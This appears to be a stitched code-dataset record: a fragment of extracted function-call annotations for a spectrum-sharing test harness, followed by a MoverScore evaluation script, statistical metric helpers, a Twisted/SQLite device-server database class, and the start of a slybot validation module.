pal_record_2], pal_low_frequency,\n pal_high_frequency, device_a['userId'])\n", (27015, 27108), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((28984, 29013), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (28995, 29013), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((29416, 29443), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (29426, 29443), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((31255, 31372), 'util.makePalRecordsConsistent', 'makePalRecordsConsistent', (['[pal_record_1, pal_record_2]', 'pal_low_frequency', 'pal_high_frequency', "device_a['userId']"], {}), "([pal_record_1, pal_record_2], pal_low_frequency,\n pal_high_frequency, device_a['userId'])\n", (31279, 31372), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((32478, 32507), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (32489, 32507), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((32901, 32928), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (32911, 32928), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((33925, 34004), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""configs"""', '"""test_WINNF_FT_S_PCR_1"""', '"""default.config"""'], {}), "('testcases', 'configs', 'test_WINNF_FT_S_PCR_1', 'default.config')\n", (33937, 34004), False, 'import os\n'), ((35144, 35173), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (35155, 35173), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((35582, 35609), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (35592, 35609), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((35780, 35813), 'util.loadConfig', 'loadConfig', (["config['configPCR_1']"], {}), "(config['configPCR_1'])\n", (35790, 35813), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((36842, 36921), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""configs"""', '"""test_WINNF_FT_S_PCR_1"""', '"""default.config"""'], {}), "('testcases', 'configs', 'test_WINNF_FT_S_PCR_1', 'default.config')\n", (36854, 36921), False, 'import os\n'), ((37705, 37795), 'reference_models.geo.utils.ShrinkAndCleanPolygon', 'utils.ShrinkAndCleanPolygon', (["overlapping_ppa_contour['features'][0]['geometry']", '(0.01)'], {}), "(overlapping_ppa_contour['features'][0][\n 'geometry'], 0.01)\n", (37732, 37795), False, 'from reference_models.geo import drive, utils\n'), ((38497, 38536), 'util.loadConfig', 'loadConfig', (['pcr_1_test_config_file_path'], {}), '(pcr_1_test_config_file_path)\n', (38507, 38536), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((39447, 39476), 'util.writeConfig', 'writeConfig', (['filename', 'config'], {}), '(filename, config)\n', (39458, 39476), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((39916, 39943), 'util.loadConfig', 'loadConfig', (['config_filename'], {}), '(config_filename)\n', (39926, 39943), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((40114, 40147), 'util.loadConfig', 'loadConfig', (["config['configPCR_1']"], {}), "(config['configPCR_1'])\n", (40124, 40147), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((10747, 10774), 'util.getCertFilename', 'getCertFilename', (['"""sas.cert"""'], {}), "('sas.cert')\n", (10762, 10774), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((10805, 10831), 'util.getCertFilename', 'getCertFilename', (['"""sas.key"""'], {}), "('sas.key')\n", (10820, 10831), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((13442, 13480), 'os.path.exists', 'os.path.exists', (['ppa_zone_data_dir_path'], {}), '(ppa_zone_data_dir_path)\n', (13456, 13480), False, 'import os\n'), ((13488, 13523), 'os.makedirs', 'os.makedirs', (['ppa_zone_data_dir_path'], {}), '(ppa_zone_data_dir_path)\n', (13499, 13523), False, 'import os\n'), ((13907, 13992), 'json.dumps', 'json.dumps', (['uut_ppa_zone_data'], {'indent': '(2)', 'sort_keys': '(False)', 'separators': "(',', ': ')"}), "(uut_ppa_zone_data, indent=2, sort_keys=False, separators=(',', ': ')\n )\n", (13917, 13992), False, 'import json\n'), ((14832, 14902), 'reference_models.geo.utils.PolygonsAlmostEqual', 'utils.PolygonsAlmostEqual', (['test_harness_ppa_geometry', 'uut_ppa_geometry'], {}), '(test_harness_ppa_geometry, uut_ppa_geometry)\n', (14857, 14902), False, 'from reference_models.geo import drive, utils\n'), ((18346, 18373), 'util.getCertFilename', 'getCertFilename', (['"""sas.cert"""'], {}), "('sas.cert')\n", (18361, 18373), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((18404, 18430), 'util.getCertFilename', 'getCertFilename', (['"""sas.key"""'], {}), "('sas.key')\n", (18419, 18430), False, 'from util import configurable_testcase, loadConfig, makePalRecordsConsistent, writeConfig, getCertificateFingerprint, makePpaAndPalRecordsConsistent, getCertFilename\n'), ((20668, 20753), 'json.dumps', 'json.dumps', (['uut_ppa_zone_data'], {'indent': '(2)', 'sort_keys': '(False)', 'separators': "(',', ': ')"}), "(uut_ppa_zone_data, indent=2, sort_keys=False, separators=(',', ': ')\n )\n", (20678, 20753), False, 'import json\n'), ((21564, 21634), 'reference_models.geo.utils.PolygonsAlmostEqual', 'utils.PolygonsAlmostEqual', (['test_harness_ppa_geometry', 'uut_ppa_geometry'], {}), '(test_harness_ppa_geometry, uut_ppa_geometry)\n', (21589, 21634), False, 'from reference_models.geo import drive, utils\n'), ((22732, 22823), 'reference_models.geo.utils.ShrinkAndCleanPolygon', 'utils.ShrinkAndCleanPolygon', (["user_claimed_ppa_contour['features'][0]['geometry']", '(0.01)'], {}), "(user_claimed_ppa_contour['features'][0][\n 'geometry'], 0.01)\n", (22759, 22823), False, 'from reference_models.geo import drive, utils\n'), ((25072, 25157), 'json.dumps', 'json.dumps', (['uut_ppa_zone_data'], {'indent': '(2)', 'sort_keys': '(False)', 'separators': "(',', ': ')"}), "(uut_ppa_zone_data, indent=2, sort_keys=False, separators=(',', ': ')\n )\n", (25082, 25157), False, 'import json\n'), ((25251, 25349), 'json.dumps', 'json.dumps', (["config['userClaimedPpaContour']"], {'indent': '(2)', 'sort_keys': '(False)', 'separators': "(',', ': ')"}), "(config['userClaimedPpaContour'], indent=2, sort_keys=False,\n separators=(',', ': '))\n", (25261, 25349), False, 'import json\n'), ((25836, 25906), 'reference_models.geo.utils.PolygonsAlmostEqual', 'utils.PolygonsAlmostEqual', (['test_harness_ppa_geometry', 'uut_ppa_geometry'], {}), '(test_harness_ppa_geometry, uut_ppa_geometry)\n', (25861, 25906), False, 'from reference_models.geo import drive, utils\n'), ((34833, 34925), 'reference_models.geo.utils.ShrinkAndCleanPolygon', 'utils.ShrinkAndCleanPolygon', (["user_claimed_ppa_contour['features'][0]['geometry']", '(-0.01)'], {}), "(user_claimed_ppa_contour['features'][0][\n 'geometry'], -0.01)\n", (34860, 34925), False, 'from reference_models.geo import drive, utils\n'), ((7853, 7911), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_1.json"""'], {}), "('testcases', 'testdata', 'pal_record_1.json')\n", (7865, 7911), False, 'import os\n'), ((7957, 8015), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_2.json"""'], {}), "('testcases', 'testdata', 'pal_record_2.json')\n", (7969, 8015), False, 'import os\n'), ((8322, 8376), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_a.json"""'], {}), "('testcases', 'testdata', 'device_a.json')\n", (8334, 8376), False, 'import os\n'), ((8418, 8472), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_b.json"""'], {}), "('testcases', 'testdata', 'device_b.json')\n", (8430, 8472), False, 'import os\n'), ((8512, 8566), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_c.json"""'], {}), "('testcases', 'testdata', 'device_c.json')\n", (8524, 8566), False, 'import os\n'), ((13619, 13712), 'json.dumps', 'json.dumps', (["uut_ppa_zone_data['zone']"], {'indent': '(2)', 'sort_keys': '(False)', 'separators': "(',', ': ')"}), "(uut_ppa_zone_data['zone'], indent=2, sort_keys=False, separators\n =(',', ': '))\n", (13629, 13712), False, 'import json\n'), ((14128, 14165), 'json.loads', 'json.loads', (['test_harness_ppa_geometry'], {}), '(test_harness_ppa_geometry)\n', (14138, 14165), False, 'import json\n'), ((15129, 15187), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_1.json"""'], {}), "('testcases', 'testdata', 'pal_record_1.json')\n", (15141, 15187), False, 'import os\n'), ((15233, 15291), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_2.json"""'], {}), "('testcases', 'testdata', 'pal_record_2.json')\n", (15245, 15291), False, 'import os\n'), ((15598, 15652), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_a.json"""'], {}), "('testcases', 'testdata', 'device_a.json')\n", (15610, 15652), False, 'import os\n'), ((15694, 15748), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_b.json"""'], {}), "('testcases', 'testdata', 'device_b.json')\n", (15706, 15748), False, 'import os\n'), ((15790, 15844), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_c.json"""'], {}), "('testcases', 'testdata', 'device_c.json')\n", (15802, 15844), False, 'import os\n'), ((20889, 20926), 'json.loads', 'json.loads', (['test_harness_ppa_geometry'], {}), '(test_harness_ppa_geometry)\n', (20899, 20926), False, 'import json\n'), ((22373, 22400), 'json.load', 'json.load', (['claimed_ppa_file'], {}), '(claimed_ppa_file)\n', (22382, 22400), False, 'import json\n'), ((26087, 26145), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_1.json"""'], {}), "('testcases', 'testdata', 'pal_record_1.json')\n", (26099, 26145), False, 'import os\n'), ((26191, 26249), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_2.json"""'], {}), "('testcases', 'testdata', 'pal_record_2.json')\n", (26203, 26249), False, 'import os\n'), ((26556, 26610), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_a.json"""'], {}), "('testcases', 'testdata', 'device_a.json')\n", (26568, 26610), False, 'import os\n'), ((26652, 26706), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_b.json"""'], {}), "('testcases', 'testdata', 'device_b.json')\n", (26664, 26706), False, 'import os\n'), ((26748, 26802), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_c.json"""'], {}), "('testcases', 'testdata', 'device_c.json')\n", (26760, 26802), False, 'import os\n'), ((30342, 30400), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_1.json"""'], {}), "('testcases', 'testdata', 'pal_record_1.json')\n", (30354, 30400), False, 'import os\n'), ((30446, 30504), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""pal_record_2.json"""'], {}), "('testcases', 'testdata', 'pal_record_2.json')\n", (30458, 30504), False, 'import os\n'), ((30811, 30865), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_a.json"""'], {}), "('testcases', 'testdata', 'device_a.json')\n", (30823, 30865), False, 'import os\n'), ((30907, 30961), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""device_b.json"""'], {}), "('testcases', 'testdata', 'device_b.json')\n", (30919, 30961), False, 'import os\n'), ((34474, 34501), 'json.load', 'json.load', (['claimed_ppa_file'], {}), '(claimed_ppa_file)\n', (34483, 34501), False, 'import json\n'), ((37393, 37423), 'json.load', 'json.load', (['overlapped_ppa_file'], {}), '(overlapped_ppa_file)\n', (37402, 37423), False, 'import json\n'), ((37927, 37985), 'os.path.join', 'os.path.join', (['"""testcases"""', '"""testdata"""', '"""ppa_record_0.json"""'], {}), "('testcases', 'testdata', 'ppa_record_0.json')\n", (37939, 37985), False, 'import os\n'), ((39048, 39060), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (39058, 39060), False, 'import uuid\n'), ((2963, 3049), 'reference_models.geo.drive.census_tract_driver.GetCensusTract', 'drive.census_tract_driver.GetCensusTract', (["pal['license']['licenseAreaIdentifier']"], {}), "(pal['license'][\n 'licenseAreaIdentifier'])\n", (3003, 3049), False, 'from reference_models.geo import drive, utils\n')]
|
# Use the original version with BERTMNLI to reproduce the results.
# from moverscore import get_idf_dict, word_mover_score
# Recommend to use this version (DistilBERT) for evaluation, if the speed is your concern.
# from moverscore_v2 import get_idf_dict, word_mover_score
import sys
del sys.path[0]
import os
os.environ['MOVERSCORE'] = '/home/xqwang/projects/qgqa/evaluation/moverscore_checkpoint'
import json
from tqdm import tqdm, trange
from moverscore import get_idf_dict, word_mover_score
def moverscore_corpus_level(hyps, refs):
idf_dict_hyp = get_idf_dict(hyps)
idf_dict_ref = get_idf_dict(refs)
scores = word_mover_score(refs, hyps, idf_dict_ref, idf_dict_hyp,
stop_words=[], n_gram=1, remove_subwords=True)
return scores
def main():
with open(dump_filename) as f:
dump_list = eval(f.read())
qgs = [ ]
refs = [ ]
for i, item in enumerate(dump_list):
# reference-free
qg, ref = item['qg'], item['question']
qgs.append(' '.join(qg))
refs.append(' '.join(ref))
moverscore_list = moverscore_corpus_level(qgs, refs)
with open('moverscore.list', 'w') as f:
print(moverscore_list, file = f)
def main_relatedness():
assert len(sys.argv) == 2, 'python moverscore.py /path/to/dump.json'
dump_json_filename = sys.argv[1]
target_dirname = os.path.dirname(dump_json_filename)
with open(dump_json_filename) as f:
dump_json = json.load(f)
contexts = [ ]
refs = [ ]
id_list = [ ]
for i, (qid, item) in enumerate(dump_json.items()):
# reference-free
context, ref = item['context'], item['question']
contexts.append(context[:512]) # ~100 words
refs.append(ref)
id_list.append(qid)
score_list = [ ]
chunk_size = 100
for begin in trange(0, len(contexts), chunk_size):
chunked_contexts, chunked_refs = contexts[begin:begin + chunk_size], refs[begin:begin + chunk_size]
chunked_score = moverscore_corpus_level(chunked_contexts, chunked_refs)
score_list.extend(chunked_score)
print('chunked')
moverscore_relatedness_list = {
qid: { 'value': score }
for qid, score in zip(id_list, score_list)
}
with open(os.path.join(target_dirname, 'moverscore_relatedness.json'), 'w') as f:
json.dump(moverscore_relatedness_list, f, indent = 4)
if __name__ == '__main__':
main_relatedness()
|
[
"json.dump",
"json.load",
"os.path.dirname",
"moverscore.word_mover_score",
"moverscore.get_idf_dict",
"os.path.join"
] |
[((557, 575), 'moverscore.get_idf_dict', 'get_idf_dict', (['hyps'], {}), '(hyps)\n', (569, 575), False, 'from moverscore import get_idf_dict, word_mover_score\n'), ((595, 613), 'moverscore.get_idf_dict', 'get_idf_dict', (['refs'], {}), '(refs)\n', (607, 613), False, 'from moverscore import get_idf_dict, word_mover_score\n'), ((627, 734), 'moverscore.word_mover_score', 'word_mover_score', (['refs', 'hyps', 'idf_dict_ref', 'idf_dict_hyp'], {'stop_words': '[]', 'n_gram': '(1)', 'remove_subwords': '(True)'}), '(refs, hyps, idf_dict_ref, idf_dict_hyp, stop_words=[],\n n_gram=1, remove_subwords=True)\n', (643, 734), False, 'from moverscore import get_idf_dict, word_mover_score\n'), ((1403, 1438), 'os.path.dirname', 'os.path.dirname', (['dump_json_filename'], {}), '(dump_json_filename)\n', (1418, 1438), False, 'import os\n'), ((1500, 1512), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1509, 1512), False, 'import json\n'), ((2384, 2435), 'json.dump', 'json.dump', (['moverscore_relatedness_list', 'f'], {'indent': '(4)'}), '(moverscore_relatedness_list, f, indent=4)\n', (2393, 2435), False, 'import json\n'), ((2304, 2363), 'os.path.join', 'os.path.join', (['target_dirname', '"""moverscore_relatedness.json"""'], {}), "(target_dirname, 'moverscore_relatedness.json')\n", (2316, 2363), False, 'import os\n')]
|
'''
File: cal_metrics.py
Author: <NAME>
Version: 0.1
Create: 2014-01-03 11:12:17
Description: Calcuating the statistic metrics metrics
'''
# updated (2014-01-03 11:12:29): updated the code
import logging
def cal_error_bound_2d(x, y, scale):
'''
calculate error budget based on x time of the Landsat and MODIS values
squrt(quad(0.005 + 0.05 * landsat) + quad(0.005 + 0.05 * modis))
'''
_count = 0
for i in range(len(x)):
_x = x[i]
_y = y[i]
_err_x = (0.005 + 0.05 * _x)
_err_y = (0.005 + 0.05 * _y)
_err_a = scale * (((_err_x ** 2) + (_err_y ** 2)) ** 0.5)
if _y > _x - _err_a and _y < _x + _err_a:
_count += 1
return float(_count) / len(x)
def cal_error_bound(x, y, scale):
'''calculate error budget based on x time of MODIS value'''
_count = 0
for i in range(len(x)):
_x = x[i]
_y = y[i]
_err = scale * (0.005 + 0.05 * _x)
if _y > _x - _err and _y < _x + _err:
_count += 1
return float(_count) / len(x)
def cal_RMSD_SP(x, y):
'''calculate RMSD SP'''
_t = 0
for i in range(len(x)):
_t += (0.005+0.5*x[i])**2 + (0.005+0.5*y[i])**2
return (_t / len(x)) ** 0.5
def cal_MBE(xs, ys):
'''calcualte MBE, returns MBE (mean bias error) and S2d (distribution of differences)'''
_t = 0
for i in range(len(xs)):
_t += (xs[i] - ys[i])
_t /= len(xs)
_s = 0
for i in range(len(xs)):
_s += (xs[i] - ys[i] - _t) ** 2
_s /= len(xs) - 1
return _t, _s
def cal_RMSD(x, y):
'''calculate RMSD'''
_v = 0
for i in range(len(x)):
_v += (x[i] - y[i]) ** 2
return _v ** 0.5
def cal_RMSDs(x, y, slope, offset):
'''return RMSD RMSDs RMSDu'''
_s = 0
_u = 0
for i in range(len(x)):
_p = x[i] * slope + offset
_s += (x[i] - _p) ** 2
_u += (y[i] - _p) ** 2
_s /= len(x)
_u /= len(x)
return (_s + _u) ** 0.5, _s ** 0.5, _u ** 0.5
def average(x):
return sum(x) / len(x)
def float_columns(cs, scale=1.0, min_v=None, max_v=None):
_ts = [[] for _v in range(len(cs))]
_len = min([len(_vs) for _vs in cs])
for i in range(_len):
try:
_vs = [float(cs[_b][i]) * scale for _b in range(len(cs))]
if min_v != None and any([_v < min_v for _v in _vs]):
continue
if max_v != None and any([_v > max_v for _v in _vs]):
continue
for i in range(len(_vs)):
_ts[i].append(_vs[i])
except ValueError:
continue
return _ts
def float_column(vs, scale=1.0, min_v=None, max_v=None):
return float_columns([vs], scale, min_v, max_v)[0]
def load_columns(f, sep=',', has_header=True, columns=None, callback=None):
'''load the values from a text file. If the file include a header line, return a dict; otherwise, return a column list'''
_cs = None
_ts = None
_ss = None
with open(f) as _fi:
_no = 0
for _l in _fi.read().splitlines():
_no += 1
if not _l:
continue
_vs = _l.split(sep)
if _cs == None:
_cs = [[] for _v in _vs]
if has_header:
_ts = _vs
else:
_ts = list(range(len(_cs)))
if columns:
_ss = [_ts.index(_c) for _c in columns if _c in columns]
if has_header:
continue
if len(_vs) < len(_cs):
logging.warning('insufficent values at line %s' % _no)
continue
if callback:
if callback(_no, _ts, _vs) == False:
continue
for i in range(len(_vs)):
if (_ss == None) or (i in _ss):
_cs[i].append(_vs[i])
logging.info('process %s lines' % _no)
if _cs == None:
logging.warning('no values loaded')
return None
if columns:
for _c in [_c for _c in _ts if _c not in columns]:
_id = _ts.index(_c)
assert(_id >= 0)
del _ts[_id], _cs[_id]
return dict(list(zip(_ts, _cs)))
|
[
"logging.warning",
"logging.info"
] |
[((3461, 3499), 'logging.info', 'logging.info', (["('process %s lines' % _no)"], {}), "('process %s lines' % _no)\n", (3473, 3499), False, 'import logging\n'), ((3523, 3558), 'logging.warning', 'logging.warning', (['"""no values loaded"""'], {}), "('no values loaded')\n", (3538, 3558), False, 'import logging\n'), ((3214, 3268), 'logging.warning', 'logging.warning', (["('insufficent values at line %s' % _no)"], {}), "('insufficent values at line %s' % _no)\n", (3229, 3268), False, 'import logging\n')]
|
import pickle
import json
import sqlite3
from twisted.enterprise import adbapi
class DB:
filename = "skynet.db"
_db = None
_ready = False
@staticmethod
def get_db():
if DB._db is None:
def callb(con):
con.row_factory = sqlite3.Row
DB._db = adbapi.ConnectionPool("sqlite3", DB.filename, cp_openfun=callb)
d = DB._db.runInteraction(DB.init_db)
d.addCallback(DB._init_db_callback)
return DB._db
@staticmethod
def init_db(txn):
txn.execute('''CREATE TABLE IF NOT EXISTS DeviceServers
(id INTEGER PRIMARY KEY, ip TEXT, port INTEGER, name TEXT)''')
txn.execute('''CREATE TABLE IF NOT EXISTS ControlServers
(id INTEGER PRIMARY KEY, ip TEXT, name TEXT)''')
txn.execute('''CREATE TABLE IF NOT EXISTS Methods
(id INTEGER PRIMARY KEY, name TEXT, Arguments TEXT, control_server INTEGER)''')
txn.execute('''CREATE TABLE IF NOT EXISTS Devices
(id INTEGER PRIMARY KEY, name TEXT, device_server INTEGER,
device_id TEXT)''')
txn.execute('''CREATE TABLE IF NOT EXISTS RawData
(id INTEGER PRIMARY KEY, device INTEGER , field TEXT,
value TEXT, date INTEGER DEFAULT (strftime('%s')))''')
txn.execute('''CREATE TABLE IF NOT EXISTS Scripts
(id INTEGER PRIMARY KEY, script TEXT)''')
@staticmethod
def _init_db_callback(res):
DB._ready = True
@staticmethod
def _check_db_ready():
while not DB._ready:
pass
@staticmethod
def get_device_servers():
db = DB.get_db()
return db.runInteraction(DB._get_device_servers)
@staticmethod
def _get_device_servers(txn):
DB._check_db_ready()
txn.execute('''SELECT * FROM DeviceServers''')
return txn.fetchall()
@staticmethod
def get_local_devid_from_remote(ip, devid):
db = DB.get_db()
return db.runInteraction(DB._get_local_devid_from_remote, ip, devid)
@staticmethod
def _get_local_devid_from_remote(txn, ip, devid):
DB._check_db_ready()
txn.execute('''SELECT id from DeviceServers WHERE ip = ? ''', (ip,))
devsid = txn.fetchone()[0]
txn.execute('''SELECT id from Devices WHERE device_server = ? AND device_id = ?''', (devsid, devid))
return txn.fetchone()[0]
@staticmethod
def get_field_value(devid, field):
db = DB.get_db()
return db.runInteraction(DB._get_field_value, devid, field)
@staticmethod
def _get_field_value(txn, devid, field):
DB._check_db_ready()
txn.execute('''SELECT value FROM RawData WHERE devid = ? AND field = ? ORDER BY id DESC''', (devid, field))
return txn.fetchone()[0]
@staticmethod
def add_script(script):
db = DB.get_db()
return db.runInteraction(DB._add_script, script)
@staticmethod
def _add_script(txn, script):
DB._check_db_ready()
s = pickle.dumps(script)
txn.execute('''INSERT INTO Scripts (script) VALUES (?)''', (s,))
script.id = txn.lastrowid
DB._edit_script(txn, script)
return script
@staticmethod
def edit_script(script):
db = DB.get_db()
return db.runInteraction(DB._edit_script, script)
@staticmethod
def _edit_script(txn, script):
DB._check_db_ready()
s = pickle.dumps(script)
txn.execute('''UPDATE Scripts Set script = ? WHERE id = ?''', (s, script.id))
return script
@staticmethod
def delete_script(sid):
db = DB.get_db()
return db.runInteraction(DB._delete_script, sid)
@staticmethod
def _delete_script(txn, sid):
DB._check_db_ready()
txn.execute('''DELETE FROM Scripts WHERE id = ?''', (sid,))
return sid
@staticmethod
def get_scripts():
db = DB.get_db()
return db.runInteraction(DB._get_scripts)
@staticmethod
def _get_scripts(txn):
DB._check_db_ready()
txn.execute('''SELECT * FROM Scripts''')
scripts = {}
ss = txn.fetchall()
for s in ss:
scripts[s[0]] = pickle.loads(s[1])
return scripts
@staticmethod
def get_id_from_ip(ip, control=False):
db = DB.get_db()
return db.runInteraction(DB._get_id_from_ip, ip, control)
@staticmethod
def _get_id_from_ip(txn, ip, control):
DB._check_db_ready()
if control:
table = "ControlServers"
else:
table = "DeviceServers"
txn.execute('''SELECT id FROM ? WHERE ip = ?''', table, ip)
return txn.fetchone()[0]
@staticmethod
def update_devices(ip, port, name, devices):
db = DB.get_db()
return db.runInteraction(DB._update_devices, ip, port, name, devices)
@staticmethod
def _update_devices(txn, ip, port, name, devices):
DB._check_db_ready()
txn.execute('''SELECT * FROM DeviceServers WHERE ip = ?''', (ip,))
server = txn.fetchone()
if server is None:
txn.execute('''INSERT INTO DeviceServers (ip, port, name) VALUES (?, ?, ?)''', (ip, port, name))
cid = txn.lastrowid
txn.execute('''SELECT * FROM DeviceServers WHERE ip = ?''', (ip,))
server = txn.fetchone()
else:
cid = server["id"]
for device in devices:
name = device["Name"]
txn.execute('''SELECT id FROM Devices WHERE device_server = ? and name = ?''', (cid, name))
r = txn.fetchone()
if r is None:
txn.execute("INSERT INTO Devices (name, device_server, device_id) VALUES (?, ?, ?)",
(name, cid, device["DevId"]))
did = txn.lastrowid
else:
did = r["id"]
txn.execute("UPDATE Devices SET device_id = ? WHERE id = ?", (device["DevId"], did))
for field in device["Fields"]:
txn.execute('''INSERT INTO RawData (device, field, value) VALUES (?, ?, ?)''',
(did, field["Name"], field["Value"]))
return server
@staticmethod
def update_methods(ip, name, methods):
db = DB.get_db()
return db.runInteraction(DB._update_methods, ip, name, methods)
@staticmethod
def _update_methods(txn, ip, name, methods):
DB._check_db_ready()
txn.execute('''SELECT id FROM ControlServers WHERE ip = ?''', (ip,))
r = txn.fetchone()
if r is None:
txn.execute('''INSERT INTO ControlServers (ip, name) VALUES (?, ?)''', (ip, name))
cid = txn.lastrowid
else:
cid = r["id"]
for method in methods:
name = method["Name"]
args = json.dumps(method["Fields"])
txn.execute('''SELECT id FROM Methods WHERE control_server = ?, name = ?''', (cid, name))
r = txn.fetchone()
if r is None:
txn.execute("INSERT INTO Methods (name, arguments, control_server) VALUES (?, ?, ?)", (name, args, cid))
else:
mid = r["id"]
txn.execute("UPDATE Methods SET arguments = ? WHERE id = ?", (args, mid))
return
@staticmethod
def get_methods():
db = DB.get_db()
return db.runInteraction(DB._get_methods)
@staticmethod
def _get_methods(txn):
DB._check_db_ready()
txn.execute('''SELECT Methods.id, Methods.name, Methods.arguments,
ControlServers.name as ControlName, ControlServers.ip as ControlIp
WHERE Methods.control_server = ControlServers.id''')
methods = txn.fetchall()
mres = []
for method in methods:
tmp = {"MethodId": method['id'], "Name": method['name'], "Fields": json.loads(method["arguments"]),
"SD": {"Name": method["ControlName"],
"IP": method["ControlIp"]}}
mres.append(tmp)
return mres
@staticmethod
def get_devices():
db = DB.get_db()
return db.runInteraction(DB._get_devices)
@staticmethod
def _get_devices(txn):
DB._check_db_ready()
txn.execute('''SELECT Devices.name, Devices.id, DeviceServers.ip, DeviceServers.name AS DeviceServerName
FROM Devices, DeviceServers WHERE Devices.device_server=DeviceServers.id''')
res = txn.fetchall()
devices = []
for line in res:
devices.append({"ID": line["id"], "Name": line["name"],
"SD": {"Name": line["DeviceServerName"], "IP": line["ip"]}})
return devices
@staticmethod
def get_remote_device_from_local(devid):
db = DB.get_db()
return db.runInteraction(DB._get_remote_device_from_local, devid)
@staticmethod
def _get_remote_device_from_local(txn, devid):
DB._check_db_ready()
txn.execute('''SELECT Devices.device_id as DevId, DeviceServers.ip From Devices, DeviceServers
WHERE Devices.device_server = DeviceServers.id AND Devices.id = ?''', str(devid))
r = txn.fetchone()
return int(r["DevId"]), r["ip"]
|
[
"pickle.loads",
"json.loads",
"pickle.dumps",
"json.dumps",
"twisted.enterprise.adbapi.ConnectionPool"
] |
[((3039, 3059), 'pickle.dumps', 'pickle.dumps', (['script'], {}), '(script)\n', (3051, 3059), False, 'import pickle\n'), ((3452, 3472), 'pickle.dumps', 'pickle.dumps', (['script'], {}), '(script)\n', (3464, 3472), False, 'import pickle\n'), ((311, 374), 'twisted.enterprise.adbapi.ConnectionPool', 'adbapi.ConnectionPool', (['"""sqlite3"""', 'DB.filename'], {'cp_openfun': 'callb'}), "('sqlite3', DB.filename, cp_openfun=callb)\n", (332, 374), False, 'from twisted.enterprise import adbapi\n'), ((4218, 4236), 'pickle.loads', 'pickle.loads', (['s[1]'], {}), '(s[1])\n', (4230, 4236), False, 'import pickle\n'), ((6850, 6878), 'json.dumps', 'json.dumps', (["method['Fields']"], {}), "(method['Fields'])\n", (6860, 6878), False, 'import json\n'), ((7876, 7907), 'json.loads', 'json.loads', (["method['arguments']"], {}), "(method['arguments'])\n", (7886, 7907), False, 'import json\n')]
|
"""Simple validation of specifications passed to slybot"""
from os.path import dirname, join
import json
